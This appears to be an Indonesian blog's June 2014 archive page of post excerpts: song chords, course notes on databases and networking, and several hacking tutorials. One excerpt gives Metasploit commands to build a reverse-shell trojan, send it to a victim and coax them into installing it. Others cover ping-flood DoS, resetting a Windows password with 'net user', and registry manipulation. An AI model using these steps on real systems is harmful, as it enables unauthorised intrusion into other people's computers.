Langsung ke konten utama

Postingan

Menampilkan postingan dari Juni, 2014

Chord Bob Marley - One Love

Bob Marley A         E One love,   one heart D           A          E        A Let's get together and feel all right                   A Hear the children crying (One love)                   E Hear the children crying (One heart)                             D                        A               E        A Sayin', "Give thanks and praise to the Lord and I will feel all right."          D           A          E        A Sayin', "Let's get together and feel all right." (Whoa, whoa, whoa, whoa) A     ...

Sistem Multimedia

Manfaat manajemen:  Efisiensi biaya dan sumebr daya maupun waktu Meningkatkan kualitas kerja Meminimalkan resiko Kontrol terhadap projek lebih baik Keuntungan dan kerugian digitasi dalam kamera: Keuntungan: mengurangi jumlah noise video, mengurasi distorsi kamera interferensi warna dan kecerahan, lebih efektif dalam proses kompresi Kekurangan: Pengguna tidak dapat mengontrol digitasi yang dilakukan Content Sound: Menyediakan proses informasi secara langsung kepada audiences, Contoh: Dialog, narasi Ambient Sound: terdiri dari suara latar belakang dan suara spesial efek Contoh: musik latar, suara pukulan, suara tembakan Digital watermarking: teknik atau seni untuk menyisipkan informasi tertentu kedalam data digital. data digital itu berupa teks, foto/gambar, audio, video, software, hardware. hal ini biasa dikenal sebagai hak cipta ( copyright). Tipe watermarking: visible (watermarking terlihat oleh indera manusia) dan Invisible (watermark tidak tampak)...

Sekuriti Sistem

Tools Indek KAMI adalah alat evaluasi untuk menganalisa tingkat kesiapan pengamanan informasi di Instansi pemerintah.  Fungsi: memberikan gambaran kondisi kesiapan kerangka kerja keamanan informasi kepada pimpinan instansi. Kematangna dalam menghadapi keamanan informasi yang telah diterapkan dan menyusun atau mengubah sistem dalam rangka perbaikan informasi.  Tools MSAT (Microsoft Security Assessment Tools) adalah Aplikasi penilaian risiko dirancang untuk memberikan informasi dan rekomendasi tentang praktik terbaik untuk keamanan informasi. Fungsi: memberikan solusi terbaik dalam rangka keamanan informasi pada suatu Instansi Pengamanan Email pada 7 layer OSI  Metode yang digunakan untuk pengamanan aplikasi yaitu dengan cara SSL (Secure Socket Layer) sebuah protokol yang bekerja dengan metode otentikasi, kemanan yang diterapkan pada setiap kelompok jaringan komputer juga dapat berbeda, Menggunakan Email OpenPGP Hubungan antara komponen handshaking dengan r...

Sistem Basis Data

KONSEP PENERAPAN POLA TRANSAKSI => Transaksi ialah aktifitas yang dilakukan oleh pengguna aplikasi yang mengakses isi dari suatu database. Sehingga database dapat telah terupdate.  => sebuah transaksi akan berhadapan dengan konsistensi database => Selama transaksi database mungkin dalam kondisi inkonsisten => Setelah transaksi selesai, database harus dalam kondisi konsisten => Dua hal pokok yg mungkin terjadi: Kerusakan dari beberapa hal seperti kerusakan hardware dan kerusakan sistem, Eksekusi konkurensi dari transaksi berganda STATUS TRANSAKSI =>  Aktif, adalah status awal; sebuah transksi akan ...

Hacking windows dengan cara backdoor di linux

Konsep backdoor Langkah pertama kita membuat virus trojan dengan aplikasi msfconsole yang nantinya berupa file .exe dimana file exe ini dikirim ke victim (korban) dengan memanfaatkan jaringan. Setelah terkirim ke korban anda membujuk hingga untuk menginstall trojan tersebut. Proses ini sudah selesai. Mari kita praktekan: #  msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.10.19 x > /root/Desktop/bunga.exe LHOST adalah ip kita /root/Desktop/bunga adalah file trojan disimpan di /root/Desktop/bunga.exe bunga.exe adalah file trojan yang akan kita kirim ke victim Setelah terbuatnya file trojan kita menuju ke aplikasi metasploit/ msfconsole # msfconsole # use exploit/multi/handler # set PAYLOAD windows/meterpreter/reverse_tcp # set LHOST 192.168.10.19 # exploit Jika sudah meterpreter> maka sudah masuk ke sistem windows korban, meterpreter> sysinfo yaitu untuk melihat OS meterpreter> ps yaitu melihat aplikasi yang akti...

Tipe Serangan DOS/DDOS

    Cara kerja DDOS dalam melakukan serangan kepada situs yang diinginkan. Secara sederhana DOS bisa digunakan dengan perintah ping. Proses ping ini ditunjukan kepada situs korban. Jika cuma beberapa komputer melakukan ping mungkin tidak ada efek bagi komputer. Tapi Jikalau ping itu digunakan banyak komputer maka bisa jadi Server bisa down.      Dalam satu komputer mengirim data sebesar 32 bytes/detik kesitus yang dituju. Misalkan jika 10.000 komputer melakukan ping secara bersamaan, maka kiriman data sebesar 312 Megabytes/detik yang diterima oleh korban. Selanjutnya 312Mb/detik data yang harus diproses oleh server dalam 1 menit saja. Jika 312Mb x 60 detik = 18720Mb. Bisa jadi situs korban mengalami lumpuh atau jika belum juga, lama kelamaan mungkin bisa down.   Jenis serangan DOS, diantaranya: Ping Of Death SYN Flooding Remote Controled Attack UDP Flood Smurf Attack Penanggulangan: Konfigurasi firewall dengan benar, gunakan tools trinoo ...

TCP VS UDP

1. TCP Pengertian TCP Transmission Control Protocol (TCP) adalah salah satu jenis protokol yang memungkinkan kumpulan komputer untuk berkomunikasi dan bertukar data didalam suatu network (jaringan). TCP merupakan suatu protokol yang berada di lapisan transpor (baik itu dalam tujuh lapis model referensi OSI atau model DARPA) yang berorientasi sambungan (connection-oriented) dan dapat diandalkan (reliable).   TCP dipakai untuk aplikasi-aplikasi yang membutuhkan keandalan data.  Awal Keberadaan TCP Konsep TCP/IP berawal dari kebutuhan DoD (Departement of Defense) AS akan suatu komunikasi di antara berbagai variasi komputer yg telah ada. Komputer-komputer DoD ini seringkali harus berhubungan antara satu organisasi peneliti dg organisasi peneliti lainnya, dan harus tetap berhubungan sehingga pertahanan negara tetap berjalan selama terjadi bencana, seperti ledakan nuklir. Oleh karenanya pada tahun 1969 dimulailah penelitian terhadap serangkaian protokol TCP/IP. Di a...

Hacking Registry dengan batch file

Pada dasarnya batch file adalah sebuah script apabila script tersebut dijalankan akan berhubungan langsung dengan shell windows. Perintah dasar seperti copy, rename dan masih banyak lagi. Kita akan bahas disini yaitu perintah REG. Perintah REG merupakan perintah untuk mengakses Registry secara langsung.  Perintah dasarnya: REG ADD REG DELETE REG COPY REG SAVE REG LOAD REG UNLOAD REG QUERY REG COMPARE REG EXPORT REG IMPORT 1. REG ADD digunakan untuk menambahkan key atau value pada registry windows. Struktur dari perintah REG ADD adalah sebagai berikut: REG ADD KeyName [/v NamaValue] [/t Type] [/d Data] [/f] Keterangan: REG ADD perintah dasar untuk menambah key atau value pada registry KeyName yang akan dijadikan sasaran (root key) HKEY_CLASSES_ROOT => HKCR HKEY_CURRENT_USER => HKCU HKEY_LOCAL_MACHINE => HKLM HKEY_USERS => HKU HKEY_CURRENT_CONFIG => HKCC NamaValue => digunakan untuk menambahkan nama value pada registry Type =...

Kord Dhyo Haw - Satukan kita

G                               D           Em saatku terjatuh.. terbaring lemah tak berarti  C                                                        G Kau slalu ada untuku kawan, bangunkanku dan bangkit kembali.. G                               D                  Em Satu tetes terjatuh...dan kau coba usapkan dan mengerti C                                                 G Kebersamaan ini kawan.. membawaku dewasakan diri  G                     ...

Cara reset Password Administator Windows

Reset Password disini yaitu sudah masuk ke sistem logon. Ketika akan reset password ada konfirmasi password lama. Cara ini tidak ada konfirmasi. jadi masukan password langsung sukses password yang anda kehendaki. Caranya buka CMD Cek terlebih dahulu user/administrator => net user Jika sudah ketemu dengan target => net user syamsul passwordini Oke sukses

Hacking Registry Windows

Registry merupakan pusat kontrol utama sistem operasi windows dimana terdapat konfigurasi windows, software dan hardware. Ternyata registry dapat dimanfaatkan untuk hacking. Buka Registry Button windows => run => regedit => enter Gambar 1. Registry windows Secara umum registry terbagi menjadi 2 unsur, yaitu Have (cabang utama) dan Values Entry. Have merupakan cabang utama pada suatu registry yang digunakan OS untuk menangani operasi tertentu. Values Entry merupakan nilai yang dimasukan pada sebuah key. Ada 5 Have utama dan fungsinya: 1. HKEY_CLASSES_ROOT untuk mengatur asosiasi file pada aplikasi tertentu yg telah terinstall 2. HKEY_CURRENT_USER untuk menyimpan informasi dan konfigurasi user yang sedang aktif 3. HKEY_LOCAL_MACHINE berisi informasi dan konfigurasi hardware dan software 4. HKEY_USERS informasi user 5. HKEY_CURRENT_CONFIG konfigurasi hardware yang telah terpasang VALUE ENTRY Value digunakan untuk mengisi dan mengubah nilai key, diantaranya: ...